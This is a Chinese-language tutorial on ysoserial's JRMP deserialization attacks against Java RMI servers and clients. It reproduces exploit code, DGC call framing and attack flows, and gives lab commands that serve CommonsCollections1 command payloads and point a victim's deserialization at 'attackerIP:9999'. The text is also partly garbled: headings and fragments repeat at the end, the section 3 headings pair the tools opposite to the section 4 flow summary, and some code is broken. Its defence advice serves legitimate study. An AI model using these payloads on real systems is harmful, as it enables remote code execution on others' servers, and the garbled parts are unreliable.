Java安全之ysoserial JRMP分析教学文档<\/h1>

一、JRMP协议概述<\/h2>
JRMP(Java Remote Method Protocol)是Java RMI(Remote Method Invocation)的底层协议，用于实现Java远程方法调用。在安全研究中，JRMP可以被利用来构造特定的反序列化攻击链。<\/p>

二、相关核心类分析<\/h2>

1. sun.rmi.transport.tcp.TCPEndpoint<\/h3>

表示基于TCP的远程通信终点(endpoint)<\/li>
包含远程主机的主机名和端口号<\/li>

用于建立TCP连接<\/li> <\/ul>

2. java.rmi.server.ObjID<\/h3>

在Java RMI中唯一标识远程对象<\/li>
每个远程对象都有一个唯一的ObjID<\/li>

用于在远程通信中识别和定位对象<\/li> <\/ul>

3. sun.rmi.server.UnicastRef<\/h3>

表示单播(Unicast)通信模式下的远程引用<\/li>
实现了RemoteRef接口<\/li>

用于在远程对象之间进行通信<\/li> <\/ul>

4. sun.rmi.transport.LiveRef<\/h3>

表示远程对象的活动引用<\/li>
包含远程对象的通信地址、端口和标识符<\/li>

用于建立与远程对象的通信连接<\/li> <\/ul>

5. java.rmi.server.RemoteObjectInvocationHandler<\/h3>

实现RMI中的代理模式<\/li>
充当远程对象的调用处理程序<\/li>

负责处理与远程对象之间的通信和结果返回<\/li> <\/ul>

6. sun.rmi.server.UnicastServerRef<\/h3>

实现基于单播通信方式的服务器端引用<\/li>
管理服务器端引用的创建、通信和远程方法调用转发<\/li>

处理序列化和反序列化<\/li> <\/ul>

7. sun.rmi.transport.Target<\/h3>

封装远程对象信息和远程通信目标<\/li>
包含远程对象本身、骨架、目标地址和对象标识符<\/li>

用于在远程通信中确定目标<\/li> <\/ul>

8. java.rmi.dgc.DGC<\/h3>

实现分布式垃圾回收的核心组件<\/li>
管理远程对象的生命周期和执行垃圾回收操作<\/li>

确保远程对象资源正确释放<\/li> <\/ul>

9. sun.rmi.transport.DGCImpl_Skel<\/h3>

实现分布式垃圾回收的关键组件<\/li>
作为服务器端的骨架类<\/li>

接收远程垃圾回收调用请求并分派给具体实现<\/li> <\/ul>

三、攻击模式分析<\/h2>

1. 对服务端的攻击模式(payloads.JRMPListener + exploit.JRMPClient)<\/h3>

payloads.JRMPListener生成payload<\/h4>

public<\/span> UnicastRemoteObject getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    int<\/span> jrmpPort =<\/span> Integer.<\/span>parseInt<\/span>(<\/span>command);<\/span>
<\/span><\/span>    UnicastRemoteObject uro =<\/span> Reflections.<\/span>createWithConstructor<\/span>(<\/span>ActivationGroupImpl.<\/span>class<\/span>,<\/span> 
<\/span><\/span>        RemoteObject.<\/span>class<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span> RemoteRef.<\/span>class<\/span> },<\/span> 
<\/span><\/span>        new<\/span> Object[]<\/span> {<\/span> new<\/span> UnicastServerRef(<\/span>jrmpPort)<\/span> });<\/span>
<\/span><\/span>    
<\/span><\/span>    Reflections.<\/span>getField<\/span>(<\/span>UnicastRemoteObject.<\/span>class<\/span>,<\/span> "port"<\/span>).<\/span>set<\/span>(<\/span>uro,<\/span> jrmpPort);<\/span>
<\/span><\/span>    return<\/span> uro;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

使用Reflections.createWithConstructor构造UnicastRemoteObject对象<\/li>
将端口作为参数创建UnicastServerRef对象<\/li>
设置UnicastRemoteObject对象的port属性<\/li>
<\/ol>
反序列化过程分析<\/h4>
函数调用栈：<\/p>
listen:319, TCPTransport (sun.rmi.transport.tcp)
exportObject:249, TCPTransport (sun.rmi.transport.tcp)
exportObject:411, TCPEndpoint (sun.rmi.transport.tcp)
exportObject:147, LiveRef (sun.rmi.transport)
exportObject:208, UnicastServerRef (sun.rmi.server)
exportObject:383, UnicastRemoteObject (java.rmi.server)
exportObject:320, UnicastRemoteObject (java.rmi.server)
reexport:266, UnicastRemoteObject (java.rmi.server)
readObject:235, UnicastRemoteObject (java.rmi.server)
<\/code><\/pre>
关键点：<\/p>

反序列化触发UnicastRemoteObject的readObject方法<\/li>
readObject调用reexport方法<\/li>
reexport调用exportObject方法<\/li>
最终在TCPTransport.listen方法中创建服务器套接字并监听<\/li>
<\/ol>
exploit.JRMPClient攻击流程<\/h4>
public<\/span> static<\/span> void<\/span> makeDGCCall<\/span>(<\/span>String hostname,<\/span> int<\/span> port,<\/span> Object payloadObject)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    InetSocketAddress isa =<\/span> new<\/span> InetSocketAddress(<\/span>hostname,<\/span> port);<\/span>
<\/span><\/span>    Socket s =<\/span> SocketFactory.<\/span>getDefault<\/span>().<\/span>createSocket<\/span>(<\/span>hostname,<\/span> port);<\/span>
<\/span><\/span>    DataOutputStream dos =<\/span> new<\/span> DataOutputStream(<\/span>s.<\/span>getOutputStream<\/span>());<\/span>
<\/span><\/span>    
<\/span><\/span>    dos.<\/span>writeInt<\/span>(<\/span>TransportConstants.<\/span>Magic<\/span>);<\/span>
<\/span><\/span>    dos.<\/span>writeShort<\/span>(<\/span>TransportConstants.<\/span>Version<\/span>);<\/span>
<\/span><\/span>    dos.<\/span>writeByte<\/span>(<\/span>TransportConstants.<\/span>SingleOpProtocol<\/span>);<\/span>
<\/span><\/span>    dos.<\/span>write<\/span>(<\/span>TransportConstants.<\/span>Call<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    ObjectOutputStream objOut =<\/span> new<\/span> MarshalOutputStream(<\/span>dos);<\/span>
<\/span><\/span>    objOut.<\/span>writeLong<\/span>(<\/span>2<\/span>);<\/span> \/\/ DGC
<\/span><\/span><\/span><\/span>    objOut.<\/span>writeInt<\/span>(<\/span>0<\/span>);<\/span>
<\/span><\/span>    objOut.<\/span>writeLong<\/span>(<\/span>0<\/span>);<\/span>
<\/span><\/span>    objOut.<\/span>writeShort<\/span>(<\/span>0<\/span>);<\/span>
<\/span><\/span>    objOut.<\/span>writeInt<\/span>(<\/span>1<\/span>);<\/span> \/\/ dirty
<\/span><\/span><\/span><\/span>    objOut.<\/span>writeLong<\/span>(-<\/span>669196253586618813L<\/span>);<\/span>
<\/span><\/span>    objOut.<\/span>writeObject<\/span>(<\/span>payloadObject);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

建立与目标服务器的连接<\/li>
写入JRMP协议头信息<\/li>
写入特定的DGC调用标识(-669196253586618813L)<\/li>
发送payload对象<\/li>
<\/ol>
2. 对客户端的攻击模式(exploit.JRMPListener + payloads.JRMPClient)<\/h3>
exploit.JRMPListener工作原理<\/h4>
public<\/span> void<\/span> run<\/span>()<\/span> {<\/span>
<\/span><\/span>    while<\/span>(!<\/span>this<\/span>.<\/span>exit<\/span> &&<\/span> (<\/span>s =<\/span> this<\/span>.<\/span>ss<\/span>.<\/span>accept<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        InputStream is =<\/span> s.<\/span>getInputStream<\/span>();<\/span>
<\/span><\/span>        DataInputStream in =<\/span> new<\/span> DataInputStream(<\/span>is);<\/span>
<\/span><\/span>        
<\/span><\/span>        int<\/span> magic =<\/span> in.<\/span>readInt<\/span>();<\/span>
<\/span><\/span>        short<\/span> version =<\/span> in.<\/span>readShort<\/span>();<\/span>
<\/span><\/span>        byte<\/span> protocol =<\/span> in.<\/span>readByte<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        switch<\/span>(<\/span>protocol)<\/span> {<\/span>
<\/span><\/span>            case<\/span> TransportConstants.<\/span>SingleOpProtocol<\/span>:<\/span>
<\/span><\/span>                doMessage(<\/span>s,<\/span> in,<\/span> out,<\/span> this<\/span>.<\/span>payloadObject<\/span>);<\/span>
<\/span><\/span>                break<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> void<\/span> doMessage<\/span>(<\/span>Socket s,<\/span> DataInputStream in,<\/span> DataOutputStream out,<\/span> Object payload)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    int<\/span> op =<\/span> in.<\/span>read<\/span>();<\/span>
<\/span><\/span>    switch<\/span>(<\/span>op)<\/span> {<\/span>
<\/span><\/span>        case<\/span> TransportConstants.<\/span>Call<\/span>:<\/span>
<\/span><\/span>            doCall(<\/span>in,<\/span> out,<\/span> payload);<\/span>
<\/span><\/span>            break<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> void<\/span> doCall<\/span>(<\/span>DataInputStream in,<\/span> DataOutputStream out,<\/span> Object payload)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>in)<\/span> {<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>            \/\/ 限制可反序列化的类
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    };<\/span>
<\/span><\/span>    
<\/span><\/span>    out.<\/span>writeByte<\/span>(<\/span>TransportConstants.<\/span>Return<\/span>);<\/span>
<\/span><\/span>    ObjectOutputStream oos =<\/span> new<\/span> JRMPClient.<\/span>MarshalOutputStream<\/span>(<\/span>out,<\/span> this<\/span>.<\/span>classpathUrl<\/span>);<\/span>
<\/span><\/span>    oos.<\/span>writeByte<\/span>(<\/span>TransportConstants.<\/span>ExceptionalReturn<\/span>);<\/span>
<\/span><\/span>    new<\/span> UID().<\/span>write<\/span>(<\/span>oos);<\/span>
<\/span><\/span>    
<\/span><\/span>    BadAttributeValueExpException ex =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>ex,<\/span> "val"<\/span>,<\/span> payload);<\/span>
<\/span><\/span>    oos.<\/span>writeObject<\/span>(<\/span>ex);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

监听指定端口等待连接<\/li>
处理JRMP协议消息<\/li>
构造包含payload的异常响应<\/li>
将payload写入BadAttributeValueExpException的val属性<\/li>
<\/ol>
payloads.JRMPClient构造<\/h4>
public<\/span> Registry getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    String host =<\/span> command.<\/span>substring<\/span>(<\/span>0<\/span>,<\/span> command.<\/span>indexOf<\/span>(<\/span>':'<\/span>));<\/span>
<\/span><\/span>    int<\/span> port =<\/span> Integer.<\/span>valueOf<\/span>(<\/span>command.<\/span>substring<\/span>(<\/span>command.<\/span>indexOf<\/span>(<\/span>':'<\/span>)<\/span> +<\/span> 1<\/span>));<\/span>
<\/span><\/span>    
<\/span><\/span>    ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span> \/\/ RMI registry
<\/span><\/span><\/span><\/span>    TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>host,<\/span> port);<\/span>
<\/span><\/span>    UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span>
<\/span><\/span>    RemoteObjectInvocationHandler obj =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span>
<\/span><\/span>    
<\/span><\/span>    Registry proxy =<\/span> (<\/span>Registry)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>        JRMPClient.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span> Registry.<\/span>class<\/span> },<\/span> 
<\/span><\/span>        obj);<\/span>
<\/span><\/span>    return<\/span> proxy;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

创建ObjID标识远程对象<\/li>
使用TCPEndpoint指定目标地址<\/li>
创建UnicastRef和LiveRef<\/li>
使用RemoteObjectInvocationHandler创建代理对象<\/li>
<\/ol>
反序列化触发流程<\/h4>
函数调用栈：<\/p>
newCall:340, UnicastRef (sun.rmi.server)
dirty:-1, DGCImpl_Stub (sun.rmi.transport)
makeDirtyCall:378, DGCClient$EndpointEntry (sun.rmi.transport)
registerRefs:320, DGCClient$EndpointEntry (sun.rmi.transport)
registerRefs:156, DGCClient (sun.rmi.transport)
read:312, LiveRef (sun.rmi.transport)
readExternal:493, UnicastRef (sun.rmi.server)
readObject:455, RemoteObject (java.rmi.server)
<\/code><\/pre>
关键点：<\/p>

反序列化触发RemoteObject的readObject方法<\/li>
readObject调用readExternal方法<\/li>
最终通过DGCClient.registerRefs注册引用<\/li>
触发与恶意JRMPListener的通信<\/li>
<\/ol>
四、攻击流程总结<\/h2>
1. 对服务端的攻击流程<\/h3>

攻击者使用vps启用ysoserial.exploit.JRMPListener，设置命令、端口和利用模块，生成payload1<\/li>
攻击者本地使用payloads.JRMPClient生成payload2，设置vps的ip与端口<\/li>
攻击者将payload2发送至存在漏洞的目标服务器<\/li>
目标服务器反序列化过程中会与exploit.JRMPListener进行通信<\/li>
vps将payload1发送至目标漏洞服务器<\/li>
漏洞服务器反序列化payload1，触发RCE<\/li>
<\/ol>
2. 对客户端的攻击流程<\/h3>

攻击者使用exploit.JRMPListener作为恶意服务器端，等待目标连接<\/li>
payloads.JRMPClient构造向JRMPListener发起远程对象请求的payload<\/li>
目标客户端反序列化payload后连接恶意JRMPListener<\/li>
JRMPListener返回包含恶意payload的响应<\/li>
客户端处理响应时触发反序列化漏洞<\/li>
<\/ol>
五、防御建议<\/h2>

升级Java环境，使用最新版本<\/li>
限制反序列化的类，使用白名单机制<\/li>
使用安全管理器限制网络访问<\/li>
监控和过滤可疑的JRMP流量<\/li>
对RMI服务进行适当的网络隔离<\/li>
<\/ol>
六、参考资源<\/h2>

https:\/\/www.cnblogs.com\/nice0e3\/p\/14333695.html<\/li>
https:\/\/xz.aliyun.com\/t\/2651<\/li>
https:\/\/xz.aliyun.com\/t\/2650<\/li>
<\/ol>
七、实验环境建议<\/h2>

JDK版本：8u66（漏洞存在版本）<\/li>
工具：ysoserial-all.jar<\/li>
测试命令示例：
# 对服务端攻击
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 'touch \/tmp\/cve-2017-3248'
java -jar ysoserial.jar JRMPClient 'vpsIP:PORT' > vulrServer

# 对客户端攻击
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 'calc.exe'
java -jar ysoserial.jar JRMPClient 'attackerIP:9999' | sendToVictim
<\/code><\/pre>
<\/li>
<\/ul>

Java安全之ysoserial JRMP分析教学文档<\/h1>

一、JRMP协议概述<\/h2> JRMP(Java Remote Method Protocol)是Java RMI(Remote Method Invocation)的底层协议，用于实现Java远程方法调用。在安全研究中，JRMP可以被利用来构造特定的反序列化攻击链。<\/p>

二、相关核心类分析<\/h2>

三、攻击模式分析<\/h2>

1. 对服务端的攻击模式(payloads.JRMPListener + exploit.JRMPClient)<\/h3>

2. 对客户端的攻击模式(exploit.JRMPListener + payloads.JRMPClient)<\/h3>

四、攻击流程总结<\/h2>

一、JRMP协议概述<\/h2>
JRMP(Java Remote Method Protocol)是Java RMI(Remote Method Invocation)的底层协议，用于实现Java远程方法调用。在安全研究中，JRMP可以被利用来构造特定的反序列化攻击链。<\/p>